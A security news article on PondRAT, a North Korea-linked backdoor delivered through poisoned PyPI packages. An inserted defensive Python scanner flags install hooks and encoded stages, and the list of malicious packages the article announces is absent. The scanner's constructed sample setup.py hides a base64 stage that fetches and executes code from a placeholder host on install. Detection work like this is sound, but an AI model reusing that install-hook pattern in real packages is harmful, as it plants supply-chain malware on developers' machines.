New PondRAT Malware Hidden in Python Packages Targets Software Developers

September 23, 2024 | Ravi Lakshmanan | Software Security / Supply Chain

North Korea-linked threat actors have been observed using poisoned Python packages as a means of distributing a new malware called PondRAT in an ongoing campaign.

According to new findings from Palo Alto Networks Unit 42, PondRAT is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor previously attributed to the Lazarus Group and deployed in attacks connected to the 3CX supply chain compromise last year.

Some of these attacks are part of a sustained campaign referred to as Operation Dream Job, in which potential targets are lured with attractive job offers in an attempt to trick them into downloading malware.

“The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages,” Unit 42 researcher Yoav Zemah said, attributing the activity with medium confidence to a threat actor called Gleaming Pisces.

The adversary is also tracked by the broader cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that is also known for distributing the AppleJeus malware.

The ultimate goal of the attacks is thought to be to “secure access to supply chain suppliers via developer endpoints and then gain access to the suppliers’ customers’ endpoints, as observed in previous incidents.”

Below is the list of malicious packages removed from the PyPI repository –

The infection chain is fairly straightforward: once the packages are downloaded and installed on developer systems, they execute an encoded next stage that, in turn, fetches and runs the Linux or macOS version of the RAT from a remote server.
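The infection chain above is the generic "setup.py runs something on install" pattern. As an added example (not code from the article or from Unit 42), here is a small static triage check that flags the two things a practitioner would look for in a downloaded sdist before installing it: a setuptools command class hooked into `pip install`, and decode/download/spawn/exec calls next to an encoded blob. The two setup.py sources at the bottom are constructed for the demo and are not the real PondRAT packages; the package name, the stage contents and the URL in it are placeholders.

```python
"""Static triage for install-time or import-time code execution in a Python package.

Added example, not code from the article or from Unit 42. It assumes the pattern the
article describes (a package that runs a next stage after install) and flags setup.py
or __init__.py sources that (a) hook setuptools install commands and (b) decode,
download, spawn or exec something. Sample sources at the bottom are constructed.
"""
import ast
import base64
import binascii
from dataclasses import dataclass

# Fully dotted call names that have no business in a setup.py.
SUSPICIOUS_CALLS = {
    "base64.b64decode", "codecs.decode", "zlib.decompress",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_output",
    "os.system", "os.popen",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
}
# Bare names that survive "from x import y", plus the builtins.
SUSPICIOUS_BARE = {"exec", "eval", "b64decode", "urlopen", "urlretrieve",
                   "Popen", "check_output", "system"}
# setuptools command classes that run during `pip install` of an sdist.
HOOK_BASES = {"install", "develop", "egg_info", "build_py", "build_ext"}


@dataclass
class Finding:
    lineno: int
    kind: str     # install_hook | cmdclass_override | suspicious_call | encoded_blob
    detail: str
    depth: int    # 0 = module level, i.e. runs when setup.py / __init__.py executes


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _looks_like_base64(s):
    """Long, whitespace-free, strictly valid base64: a likely embedded stage."""
    if len(s) < 64 or len(s) % 4 or any(c.isspace() for c in s):
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


class _Visitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []
        self.depth = 0

    def _add(self, node, kind, detail):
        self.findings.append(Finding(node.lineno, kind, detail, self.depth))

    def visit_FunctionDef(self, node):
        self.depth += 1          # code in a function only runs if something calls it
        self.generic_visit(node)
        self.depth -= 1

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_ClassDef(self, node):
        for b in node.bases:
            base = _dotted_name(b).rsplit(".", 1)[-1]
            if base in HOOK_BASES:
                self._add(node, "install_hook",
                          f"class {node.name} subclasses setuptools '{base}'")
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _dotted_name(node.func)
        if name in SUSPICIOUS_CALLS or name.rsplit(".", 1)[-1] in SUSPICIOUS_BARE:
            self._add(node, "suspicious_call", name)
        if name.rsplit(".", 1)[-1] == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    self._add(node, "cmdclass_override",
                              "setup(cmdclass=...) replaces install commands")
        self.generic_visit(node)     # descend into arguments, e.g. exec(compile(...))

    def visit_Constant(self, node):
        if isinstance(node.value, str) and _looks_like_base64(node.value):
            self._add(node, "encoded_blob", f"{len(node.value)}-char base64-looking string")


def scan_source(source):
    """Return all findings for one Python source file (setup.py, __init__.py, ...)."""
    v = _Visitor()
    v.visit(ast.parse(source))
    return v.findings


def is_suspicious(source):
    """Hooked install command plus decode/exec/download, or such a call at module level."""
    findings = scan_source(source)
    kinds = {f.kind for f in findings}
    hooked = bool(kinds & {"install_hook", "cmdclass_override"})
    payloadish = bool(kinds & {"suspicious_call", "encoded_blob"})
    module_level = any(f.kind == "suspicious_call" and f.depth == 0 for f in findings)
    return (hooked and payloadish) or module_level


# Constructed samples (placeholder name, stage and URL; not the real packages).
_STAGE = b"import urllib.request\nexec(urllib.request.urlopen('http://example.invalid/s').read())\n"
MALICIOUS_SETUP = f'''
from setuptools import setup
from setuptools.command.install import install
import base64

class PostInstall(install):
    def run(self):
        install.run(self)
        stage = base64.b64decode("{base64.b64encode(_STAGE).decode()}")
        exec(compile(stage, "<stage>", "exec"))

setup(name="example-utils", version="0.1", cmdclass={{"install": PostInstall}})
'''
BENIGN_SETUP = '''
from setuptools import setup, find_packages

setup(name="example-utils", version="0.1", packages=find_packages(),
      install_requires=["colorama>=0.4"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, "->", "SUSPICIOUS" if is_suspicious(src) else "clean")
        for f in scan_source(src):
            print(f"  line {f.lineno}: {f.kind}: {f.detail}")
```

Run `scan_source` over `setup.py` and every `__init__.py` in an unpacked sdist (`pip download --no-binary :all: --no-deps <pkg>`) before installing. The module-level rule also covers the import-time variant, where the stage runs from `__init__.py` the first time the package is imported rather than from an install hook. Expect some false positives from packages that shell out to `git describe` for versioning; the point is to get a human to read the flagged lines, not to block automatically.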

Further analysis of PondRAT revealed similarities to both POOLRAT and AppleJeus; the attacks also distributed new Linux versions of POOLRAT.

“The Linux and macOS versions of POOLRAT use the same function structure to load their configurations, offering similar method names and functionality,” Zemah said.

“Additionally, the method names in both variants are strikingly similar and the strings are nearly identical. Finally, the mechanism that processes commands (from the command and control server) is nearly identical.”

A leaner version of POOLRAT, PondRAT comes with the ability to upload and download files, pause operations at a predefined time interval, and execute arbitrary commands.

“Evidence on additional Linux versions of POOLRAT has shown that Gleaming Pisces has improved its capabilities on both Linux and macOS platforms,” Unit 42 said.

“Weaponization of seemingly legitimate Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can lead to a malware infection that compromises the entire network.”

The disclosure comes as KnowBe4, which was itself tricked into hiring a North Korean threat actor as an employee, reported that more than a dozen companies “either hired North Korean employees or were besieged by a flood of fake resumes and applications sent by North Koreans hoping to find work at their organizations.”

The activity, tracked by CrowdStrike under the name Famous Chollima, has been described as a “complex, industrial, nation-state operation” that poses “a serious risk to any company with employees working exclusively remotely.”